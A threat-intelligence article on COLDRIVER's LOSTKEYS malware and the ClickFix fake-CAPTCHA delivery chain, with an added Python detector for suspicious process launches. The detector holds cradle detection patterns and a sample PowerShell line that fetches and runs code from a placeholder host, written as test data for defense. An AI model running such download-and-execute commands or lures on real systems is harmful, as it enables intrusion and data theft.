LOSTKEYS Malware
The Russia-linked threat actor known as COLDRIVER has expanded its toolkit, moving beyond traditional credential phishing campaigns. Recently, the group was spotted deploying a new malware strain called LOSTKEYS in a targeted espionage campaign. This marks the second custom malware linked to COLDRIVER, following SPICA. Also tracked under aliases like Callisto, Star Blizzard, and UNC4057, COLDRIVER is infamous for credential theft, email exfiltration, and contact list harvesting. Now, its playbook includes selective malware deployment to access system files and data.
LOSTKEYS Unveiled: A Stealthy and Targeted Threat
LOSTKEYS is designed to stealthily exfiltrate sensitive information, including files from specific directories, running processes and system details. It has been deployed in operations during January, March and April 2025. Targets include current and former advisors to Western governments and militaries, journalists, think tanks, NGOs and individuals associated with Ukraine. Notably, the malware seems to be deployed selectively, emphasizing its use in highly targeted attacks.
Social Engineering 2.0: The ClickFix Connection
The infection chain begins with a fake CAPTCHA prompt hosted on a decoy website. Victims are tricked into opening the Windows Run dialog and pasting a PowerShell command copied to their clipboard—a method known as ClickFix. This command fetches a second-stage downloader from a remote server, which then delivers a third-stage PowerShell script. This script executes LOSTKEYS on the host while evading detection in virtual environments.
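The chain described above (Run dialog, PowerShell, remote fetch, a further PowerShell stage) leaves a recognisable parent/child process trail. As an added example, not code from the report or from any vendor, this Python detector runs over constructed JSON-lines process-creation records that use Sysmon Event ID 1 field names and flags explorer.exe spawning a script host with a download cradle, plus script hosts chaining later stages; the hostnames, user names and base64 blob are placeholders.

```python
import json
import re

# A command pasted into the Run dialog is spawned by explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}
# Script hosts a ClickFix lure tells the victim to paste into.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Indicators of a fetch-and-execute download cradle, matched case-insensitively.
CRADLE_PATTERNS = {
    "web_request": r"invoke-webrequest|\biwr\b|downloadstring|\bcurl\b|\bwget\b",
    "remote_url": r"https?://",
    "exec_in_memory": r"invoke-expression|\biex\b",
    "encoded_command": r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}",
}

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return matched indicator names; an empty list means not ClickFix-like."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    hits = [n for n, p in CRADLE_PATTERNS.items() if re.search(p, event.get("CommandLine", ""), re.I)]
    if not hits or image not in SCRIPT_HOSTS:
        return []  # explorer.exe launching a script host alone is far too noisy to alert on
    if parent in RUN_DIALOG_PARENTS:
        return ["run_dialog_launch"] + hits  # stage 1: the pasted Run-dialog command
    if parent in SCRIPT_HOSTS:
        return ["script_host_chain"] + hits  # later stages: script host spawning script host
    return []

def detect(jsonl):
    """Return (user, image, indicators) for each suspicious event in a JSON-lines string."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    return [(e.get("User", "?"), basename(e["Image"]), ind) for e in events if (ind := classify(e))]

# Constructed sample events; the URL host and the base64 blob are placeholders, not real IoCs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": "CORP\\alice",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://captcha.example.invalid/s1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\notepad.exe",
     "User": "CORP\\alice", "CommandLine": "notepad.exe notes.txt"},
    {"ParentImage": r"C:\Tools\code.exe", "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "User": "CORP\\bob", "CommandLine": "pwsh -NoProfile -File build.ps1"},
    {"ParentImage": PS, "Image": PS, "User": "CORP\\alice",
     "CommandLine": "powershell -enc QUJDREVGR0hJSktMTU5PUA=="},
])
if __name__ == "__main__":
    for user, image, indicators in detect(SAMPLE_EVENTS):
        print(f"ALERT user={user} image={image} indicators={','.join(indicators)}")
```

When triaging an alert, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU shows what the user actually pasted, which confirms the ClickFix path rather than a shortcut or scheduled launch.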
Repurposed Malware or Early Testing?
Security researchers discovered LOSTKEYS samples dating back to December 2023 that mimicked binaries from Maltego, an open-source investigation platform. It's still unclear whether these were early test versions or unrelated uses of the malware prior to its confirmed deployment in 2025.
ClickFix’s Broader Adoption and Harmful Reach
The ClickFix technique is gaining popularity among various threat actors for malware distribution. Two notable examples include:
- Lampion Banking Trojan: Delivered via phishing emails with ZIP attachments. Inside, an HTML file redirects victims to a fake CAPTCHA page with ClickFix instructions, initiating a multi-stage infection targeting Portuguese-speaking sectors such as government, finance, and transportation.
- Atomic Stealer for macOS: Paired with a tactic called EtherHiding, where Binance Smart Chain (BSC) contracts hide payloads. Victims who click 'I'm not a robot' unknowingly trigger a Base64 command, which is then run in Terminal to download and execute a signed Mach-O binary confirmed as Atomic Stealer.
MacReaper: A Widespread Campaign with Legitimate Website Exploitation
Further investigation has linked the Atomic Stealer campaign to a large-scale watering hole attack dubbed MacReaper. Nearly 2,800 legitimate websites were compromised to display fake CAPTCHA prompts. These attacks used obfuscated JavaScript, full-screen iframes and blockchain-based infrastructure to evade detection and maximize infections.